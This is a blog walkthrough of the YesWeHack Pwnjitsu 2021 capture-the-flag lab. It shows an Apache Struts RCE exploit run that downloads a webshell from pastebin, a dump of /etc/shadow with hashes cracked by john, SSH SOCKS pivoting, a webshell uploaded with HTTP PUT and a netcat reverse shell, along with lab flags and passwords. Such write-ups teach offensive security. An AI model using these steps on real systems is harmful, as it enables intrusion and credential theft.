Wednesday, March 16, 2022

YesWehack Pwnjitsu CTF 2021



Back in 2021, I was invited to participate in a CTF challenge, I don't normally do CTFs but since I was personally invited by a friend, I couldn't say No. 

Here's the walkthru, nothing too difficult. 4 out of 10 for difficulty. There was about 4 hosts that participants had to fully compromise. Each host had a secret file that contained the flag. In total there were 6 flags to capture. Participants were given about 16 hours but I completed it in under 8 hours and a small bounty of Euro400 was paid to me shortly. 😍

1. The initial entry was via Apache struts RCE. I can't remember how I spotted the bug initially, perhaps I crawled it with Burp and saw that it had Apache Struts installed. Exploitation was straight forward - script kiddie style haha.

$ python ApacheStruts.py http://172.16.1.33:8080/continuum/security/login.action

+] RUN EXPLOIT CVE-2013-2251
     [-] NO VULNERABLE TO CVE-2013-2251
 [+] RUN EXPLOIT CVE-2017-5638
   [-] VULNERABLE
   [-] RUN THIS EXPLOIT (s/n): s
   [-] GET PROMPT...

   * [UPLOAD SHELL]
     Struts@Shell:$ pwnd (php)
   * [DOWNLOAD SHELL]
     wget https://pastebin.com/raw/baJmN8G8 -O /tmp/status.php


Struts2@CVE-2017-5638 $ ls
LICENSE
NOTICE
apps
bin
conf
contexts
data
derby.log
flag.txt
lib
logs
tmp


Struts2@CVE-2017-5638 $ id
uid=0(root) gid=0(root) groups=0(root)


Struts2@CVE-2017-5638 $ pwd
/opt/apache_continuum/apache-continuum-1.4.2


Struts2@CVE-2017-5638 $ cat flag.txt
PWNJUTSU{WmuK1PidRLYt5gUnoC6UdtWLNM659Yvb}


2. Since I got root  directly from the Apache Struts RCE, the next move was to crack shadow passwd file:

Struts2@CVE-2017-5638 $ cat /etc/shadow
root:!:18688:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:18688:0:99999:7:::
sshd:*:18688:0:99999:7:::
statd:*:18688:0:99999:7:::
vagrant:$6$/Z97giSD$w1G/dmR09EnAh5hY47o/Hmb7ExAFHWwqfwsL1lvhpP41jDdP07ij4S3.RM/ZLBHX06Wm5QJ0Tx2/m3TJo.o5E0:18688:0:99999:7:::
dirmngr:*:18688:0:99999:7:::
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18688:0:99999:7:::
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18688:0:99999:7:::
boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18688:0:99999:7:::
chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18688:0:99999:7:::
mysql:!:18688:0:99999:7:::
splunk:!:18688:0:99999:7:::

- Just like anyone else, I feed the hash into john to crack :-) It didn't take too long to crack it, passwd was very simple.

$ john pass.txt 
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt"
Use the "--format=md5crypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
vagrant          (vagrant)
1g 0:00:00:00 DONE 1/3 (2021-06-01 22:02) 25.00g/s 800.0p/s 800.0c/s 800.0C/s vagrant..Vagrant12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

- Used the cracked passwd to ssh to another victim host:

$ ssh 172.16.1.33 -l vagrant
vagrant@172.16.1.33's password: 
Last login: Wed May  5 21:21:19 2021
vagrant@n33-vm1:~$ id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
vagrant@n33-vm1:~$ 

- get the 2nd flag :-)

vagrant@n33-vm1:~$ cat flag.txt 
PWNJUTSU{7QLtE5Aao737TVWyc7FvyA7CWLRny9Mq}
vagrant@n33-vm1:~$ 


3. Now, time to Priv escalate to w0000t, a quick sudo su - did the job!

vagrant@n33-vm1:/home$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:cf:43:2c  
          inet addr:10.33.1.1  Bcast:10.33.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fecf:432c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:789997 errors:0 dropped:0 overruns:0 frame:0
          TX packets:923201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:91918138 (91.9 MB)  TX bytes:467250606 (467.2 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:570349 errors:0 dropped:0 overruns:0 frame:0
          TX packets:570349 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:35506673 (35.5 MB)  TX bytes:35506673 (35.5 MB)

vagrant@n33-vm1:/home$ sudo su -
root@n33-vm1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@n33-vm1:~# 

- get the next flag:

root@n33-vm1:~# pwd
/root
root@n33-vm1:~# ls
flag.txt
root@n33-vm1:~# cat flag.txt 
PWNJUTSU{jnmTumzqX4uMh9SIASsHNkv2j9KVD1u6}
root@n33-vm1:~# 

- and another flag:

oot@n33-vm1:/home/boba_fett# cat flag.txt 
PWNJUTSU{2uUyMnSIPNfvBYf1bUDJFrf8stkgkklV}

- another flag:

root@n33-vm1:/home/han_solo# cat flag.txt 
PWNJUTSU{wmyCXCEuXa3K2GckUzarcpQSf5Zudv58}
root@n33-vm1:/home/han_solo# 


4. Pivot to another victim host:

- on vm1, I nmap the net to see what was around me:

root@n33-vm1:/home/boba_fett# nmap 10.33.1.0/24 -n

Starting Nmap 6.40 ( http://nmap.org ) at 2021-06-01 14:10 UTC
Nmap scan report for 10.33.1.2
Host is up (0.00026s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
9200/tcp  open  wap-wsp
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 00:0C:29:64:87:FC (VMware)

Nmap scan report for 10.33.1.3
Host is up (0.00023s latency).
All 1000 scanned ports on 10.33.1.3 are filtered
MAC Address: 00:0C:29:F8:F3:74 (VMware)

Nmap scan report for 10.33.1.254
Host is up (-0.100s latency).
All 1000 scanned ports on 10.33.1.254 are filtered
MAC Address: 00:0C:29:FC:A6:7C (VMware)

Nmap scan report for 10.33.1.1
Host is up (0.000010s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
6667/tcp open  irc
8080/tcp open  http-proxy

Nmap done: 256 IP addresses (4 hosts up) scanned in 205.90 seconds

- I needed to access the 10.33 network from my attacker host on 172.16.1.33. So I setup a SOCKS to 10.33.1.1 to bridge the 2 hosts:

$ ssh -D 1337 -q -C -N vagrant@172.16.1.33
vagrant@172.16.1.33's password: 

- Now I can point my browser to use localhost socks on 1337/tcp and I can access 10.33.1.2 web services:





- phpinfo() indicates that the next victim host is a windows box:







5. I found that it supported HTTP PUT. Simple enough, just upload my shell and I should get RCE on 10.33.1.2.

- Create one-liner webshell using PUT






- Obtain RCE using webshell





- To see what's in the webserver, I did a dir listing using 'dir':





- obtain the flag:





6. I needed a better connection to this host, so I decided the create a rev shell. Like all good script kiddies, I uploaded windows rev shell to 10.33.1.2 using the same PUT method:




- Caught the rev shell with netcat:

vagrant@n33-vm1:~$ nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [10.33.1.2] port 1234 [tcp/*] accepted (family 2, sport 49243)
b374k shell : connected

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\www\uploads\test>whoami
whoami
nt authority\local service

C:\wamp\www\uploads\test>

- obtain password_flag.txt

 lando_calrissian 's accounts

==============================

Administrator / @dm1n1str8r

lando_calrissian / @dm1n1str8r

- remove the spaces:

PWNJUTSU{bAsLAANvrsFauBXKoPeuhWAfZyP3DnJk}


- ssh to 10.33.1.2

vagrant@n33-vm1:~$ ssh -l lando_calrissian 10.33.1.2
lando_calrissian@10.33.1.2's password: 
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator\Documents\files>whoami
whoami
nt authority\local service

- get the flag:

C:\Program Files\OpenSSH\home\lando_calrissian>dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 64C4-FFBE

 Directory of C:\Program Files\OpenSSH\home\lando_calrissian

04/18/2021  01:49 PM    <DIR>          .
04/18/2021  01:49 PM    <DIR>          ..
05/26/2021  08:57 PM                90 flag.txt
               1 File(s)             90 bytes
               2 Dir(s)  44,618,330,112 bytes free

C:\Program Files\OpenSSH\home\lando_calrissian>more flag.txt
PWNJUTSU{jmdFwrr6KZNis6y2U9VhZz62IRHplCG5}

7. Now pivot to another host - 10.33.1.3. Same thing, create socks on 10.33.1.2

vagrant@n33-vm1:~$ ssh -D 1337 -q -C -N  -l lando_calrissian 10.33.1.2

- on 10.33.1.2 I did another nmap to see what's around me: 

vagrant@n33-vm1:~$ sudo nmap --proxy socks4://127.0.0.1:1337 10.33.1.3 -n -sN


- Another method is to create socks from 10.33.1.1 to 10.33.1.2:

vagrant@n33-vm1:~$ ssh -D 1337 -q -C -N  -l lando_calrissian 10.33.1.2
lando_calrissian@10.33.1.2's password: 


- on 10.33.1.1 I did a port fwd:

$ ssh -L 8081:localhost:1337 vagrant@172.16.1.33
vagrant@172.16.1.33's password: 

- then edit proxychain.conf:

 socks4 127.0.0.1 8081

- then proxychains nmap 10.33.1.3 or dirb 10.33.1.3 for burp point socks to 127.0.0.1:8081 then browse to 10.33.1.3

$ proxychains nmap 10.33.1.3 -n
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-03 22:03 +08
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:8888-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:23-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:135-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:111-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:53-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:1025-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:993-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:256-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:3389-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:554-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:443-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:3306-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:5900-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:110-<--timeout


8. Obtain Flag on 10.33.1.3:

- vnc to it passwd is password

$proxychains xtightvncviewer 10.33.1.3 -compresslevel 9 -quality 4 -depth 8

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:5900-<><>-OK
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "captain's X desktop (n33-vm3:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

flag screenshot: 10.33.3-vnc.png




- there is also a drupal webpage on 10.33.1.3 but easier to ssh to it:
 passwd is captain

$ proxychains ssh 10.33.1.3 -l captain
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:22-<><>-OK
The authenticity of host '10.33.1.3 (10.33.1.3)' can't be established.
ECDSA key fingerprint is SHA256:hvwDN/6vV9Q/eULn6TD3ZJ9Cljn2cwy25/Sk0DOFnXc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.33.1.3' (ECDSA) to the list of known hosts.
captain@10.33.1.3's password: 
captain@n33-vm3:~$ id
uid=1002(captain) gid=1002(captain) groups=1002(captain)
captain@n33-vm3:~$ 

9. priv esc on 10.33.1.3:

- read the history file for user captain to find a passwd hash:

captain@n33-vm3:~$ history 
    1  ls -la 
    2  ps -ef
    3  netstat -nao
    4  cd
    5  mkdir -p .vnc
    6  vncserver 
    7  vncserver -kill :1
    8  ifconfig
    9  ip a
   10  ls -la
   11  cd /tmp
   12  rm tempfile
   13  cd
   14  su
   15  su
   16  su
   17  sudo --help
   18  su
   19  root
   20  su root
   21  root
   22  su root root
   23  sudo -iS root
   24  cat /etc/passwd
   25  echo root | sudo passwd
   26  apt update
   27  apt install sl
   28  apt upgrade
   29  apt install python3-pip
   30  echo root:$6$tIOfiXdyfe7nDTP0$QJjeL9ktKC0qrE.Ma0etiyVcJggaInuAkn7V1ruENQg3BeQ5sWhEORVzT2HBYmxoHSk3cdZNf53YcgUakUBEH.:18619:0:99999:7::: >> /etc/shadow
   31  htop
   32  top
   33  rm -rf /data/yolo

- use john to crack the root passwd:

$john shadow.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
root             (root)
1g 0:00:00:00 DONE 1/3 (2021-06-03 22:36) 25.00g/s 800.0p/s 800.0c/s 800.0C/s root..Root12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

- su to root passwd is root:

captain@n33-vm3:~$ su - root
Password: 
root@n33-vm3:~# cd /root
root@n33-vm3:~# ls -al
total 120
drwx------ 17 root root 4096 May 26 20:48 .
drwxr-xr-x 20 root root 4096 Dec 22 12:21 ..
-rw-------  1 root root 9826 May 25 14:19 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  6 root root 4096 May 25 14:10 .cache
drwx------ 11 root root 4096 May 25 14:11 .config
drwxr-xr-x  2 root root 4096 May 25 14:10 Desktop
drwxr-xr-x  2 root root 4096 Dec 23 14:46 Documents
drwxr-xr-x  2 root root 4096 Mar 26 15:21 Downloads
-r--------  1 root root   49 May 26 20:48 final_flag.txt
drwx------  3 root root 4096 May 25 14:10 .gnupg
-rw-------  1 root root   36 May  8 09:06 .lesshst
drwxr-xr-x  3 root root 4096 May 25 14:10 .local
drwxr-xr-x  2 root root 4096 May 25 14:10 Music
drwxr-xr-x  2 root root 4096 Dec 23 09:25 Pictures
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwxr-xr-x  2 root root 4096 May 25 14:10 Public
-rw-r--r--  1 root root   75 Apr 13 08:22 .selected_editor
drwxr-xr-x  3 root root 4096 Dec 22 12:28 snap
drwx------  2 root root 4096 Apr 20 16:11 .ssh
drwxr-xr-x  2 root root 4096 May 25 14:10 Templates
drwxr-xr-x  2 root root 4096 May 25 14:10 Videos
drwxr-xr-x  2 root root 4096 Apr 16 16:15 .vim
-rw-------  1 root root 9359 May 25 21:10 .viminfo
-rw-------  1 root root   51 May 25 14:18 .Xauthority
-rw-------  1 root root 2281 May 25 14:18 .xsession-errors
root@n33-vm3:~# cat final_flag.txt 
FINAL_PWNJUTSU{42tBxe6uasbxPLhJWS9gV7nPYvyycGtQ}
root@n33-vm3:~# 

10. Game over!
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)